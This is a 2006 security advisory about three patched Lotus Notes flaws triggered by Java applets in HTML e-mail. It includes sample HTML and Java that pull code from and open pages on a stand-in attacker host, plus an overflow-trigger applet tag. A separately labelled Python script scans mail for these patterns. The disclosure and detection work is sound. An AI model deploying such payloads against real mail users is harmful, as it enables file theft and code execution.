lotusApplets.txt

lotusApplets.txt
Posted Oct 12, 2006
Authored by Jouko Pynnonen | Site klikki.fi

Lotus Notes 6.0.x prior to 6.0.5 and 6.5.x prior to 6.5.4 suffer from three vulnerabilities involving Java applets embedded in HTML e-mail: unrestricted local file read, forced launch of a web browser, and a buffer overflow in codebase handling.

tags | advisory, java, vulnerability
SHA-256 | 188ae90a30e7d9541579af061add5af04f503a733924b2d8a5170fb390ddfcc7

OVERVIEW
========

Lotus Notes is a groupware/e-mail system developed by Lotus Software.
Due to its security and collaboration features it's used particularly
by large organizations, government agencies, etc. IBM estimates it is
used by 60 million people.

Out of academic interest, I'm posting some technical details of three
old Lotus Notes 6.0.x/6.5.x vulnerabilities. IBM was notified in
July-August 2004 and a fix is available.



DETAILS
=======

The vulnerabilities involve Java applets embedded in HTML formatted
e-mail messages. A contributing factor in all of the issues is that
such applets are automatically loaded and run when the e-mail message
is viewed (unlike in most e-mail clients).



* Vulnerability 1: global file read access

An e-mail message containing a Java applet whose codebase is
"file:///" gains unrestricted read access to local files when the
e-mail is viewed. An example HTML snippet follows:

<applet codebase="file:///" archive="http://www.attacker.tld/applet.jar"
width="1" height="1"></applet>

The applet's Java bytecode need not be contained in the e-mail; it is
only referenced by the archive URL and is fetched from the attacker's
server when the message is viewed, at which point the applet is loaded
automatically. It then has read access to the local file system: it
can read any file the currently logged-in user can read and list the
contents of the local drives. The applet can relay the files to the
attacker, e.g. via JavaScript.



* Vulnerability 2: launching web browser

A Java applet embedded in the same way can forcibly launch a web
browser with a URL of the attacker's choosing when an e-mail message is
viewed. An example init() method of a java.applet.Applet subclass that
does this follows (AppletContext.showDocument takes a java.net.URL, whose
constructor declares a checked MalformedURLException):

public void init() {
    try { getAppletContext().showDocument(new java.net.URL("http://www.attacker.tld/ie-exploits.html")); }
    catch (java.net.MalformedURLException e) { /* cannot happen for this constant URL */ }
}

Under default settings, Internet Explorer is launched and the
attacker-supplied URL is opened in it when the e-mail message is
viewed. This exposes the system to any Internet Explorer vulnerability,
greatly widening the attack surface.



* Vulnerability 3: codebase buffer overflow

Opening an HTML e-mail message containing an applet tag with a long
codebase parameter (over 500 bytes) causes what appears to be a
stack-based buffer overflow. It may be exploitable to run arbitrary
code on the victim system when the e-mail message is viewed. An
example piece of HTML that triggers it:

<applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA"
code="java.applet.Applet" width=100 height=100></applet>

Exploitability of this scenario was NOT confirmed.
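The following Python script is an added example and is not part of the original advisory. It extracts every applet tag from an HTML mail body and flags the three patterns described above (a file: codebase, a remotely fetched archive, and a codebase over 500 bytes), which is the check a mail gateway or an incident responder could run over suspect messages. The sample messages, the quarantine policy and the function names are constructed for this example; the host name www.attacker.tld is the advisory's own placeholder. Vulnerability 2 cannot be recognised from the HTML alone, because the showDocument call lives in the bytecode fetched at view time, so the script treats any applet in a mail body as grounds to hold the message, which is also the reasoning behind the workaround below.

```python
"""Triage helper for the three Lotus Notes applet issues above.

Added example, not code from the original advisory. It parses an HTML
mail body, collects every <applet> tag and flags the patterns the
advisory describes. The sample messages at the bottom are constructed
for this example.
"""
import re
from html.parser import HTMLParser

# The advisory reports the overflow for codebase values over 500 bytes.
CODEBASE_OVERFLOW_LEN = 500
REMOTE_SCHEME = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


class AppletFinder(HTMLParser):
    """Collects the attributes of every <applet> start tag."""

    def __init__(self):
        super().__init__()
        self.applets = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        if tag == "applet":
            self.applets.append({name: (value or "").strip() for name, value in attrs})


def classify_applet(attrs):
    """Return the list of advisory patterns a single applet tag matches."""
    codebase = attrs.get("codebase", "")
    # archive may list several jars separated by commas
    archives = [a.strip() for a in attrs.get("archive", "").split(",") if a.strip()]
    scheme = codebase.split(":", 1)[0].lower() if ":" in codebase else ""

    flags = []
    if scheme == "file":
        # Vulnerability 1: a file: codebase gives the applet local file read access.
        flags.append("file-codebase")
    if any(REMOTE_SCHEME.match(a) for a in archives):
        # Bytecode is fetched from the network at view time, so the mail body
        # alone does not reveal what the applet does (vulnerability 2's
        # showDocument call lives in that bytecode).
        flags.append("remote-archive")
    if len(codebase.encode("utf-8")) > CODEBASE_OVERFLOW_LEN:
        # Vulnerability 3: an overlong codebase triggers the overflow.
        flags.append("long-codebase")
    return flags


def scan_html(body):
    """Return one record per applet tag: its codebase, archive and flags."""
    finder = AppletFinder()
    finder.feed(body)
    finder.close()
    return [
        {
            "codebase": a.get("codebase", ""),
            "archive": a.get("archive", ""),
            "flags": classify_applet(a),
        }
        for a in finder.applets
    ]


def should_quarantine(body):
    """Affected Notes versions auto-run any applet in an HTML mail, so the
    mere presence of one is enough to hold the message (constructed policy)."""
    return len(scan_html(body)) > 0


# Constructed sample messages; the first two mirror the advisory's snippets.
MAIL_FILE_READ = (
    '<html><body>Quarterly report attached.'
    '<applet codebase="file:///" archive="http://www.attacker.tld/applet.jar"'
    ' width="1" height="1"></applet></body></html>'
)
MAIL_OVERFLOW = (
    '<html><body><applet codebase="A:' + "A" * 520 + '"'
    ' code="java.applet.Applet" width=100 height=100></applet></body></html>'
)
MAIL_BENIGN = '<html><body><p>No applets here.</p><img src="cid:logo"></body></html>'

if __name__ == "__main__":
    samples = [("file-read", MAIL_FILE_READ), ("overflow", MAIL_OVERFLOW), ("benign", MAIL_BENIGN)]
    for name, body in samples:
        print(name, "quarantine" if should_quarantine(body) else "pass", scan_html(body))
```

Run it directly to print the verdict for the three constructed messages; on a gateway you would feed it the decoded text/html part of each message rather than the raw MIME.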



WORKAROUND
==========

Disabling Java applets can be used to protect from these
vulnerabilities. To disable Java applets, select File -> Preferences
-> User Preferences from the Notes client menu and uncheck the option
for "Enable Java applets."



SOLUTION
========

The issues have been addressed in Lotus Notes versions 6.5.4 and
6.0.5. For detailed fix information, see

http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg21173910&loc=en_US&cs=utf-8&cc=us&lang=en



CREDITS
=======

The vulnerability was discovered and researched by Jouko Pynnönen,
Klikki Oy, Finland.



--
Jouko Pynnonen <jouko@iki.fi>
Klikki Oy
http://iki.fi/jouko
© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close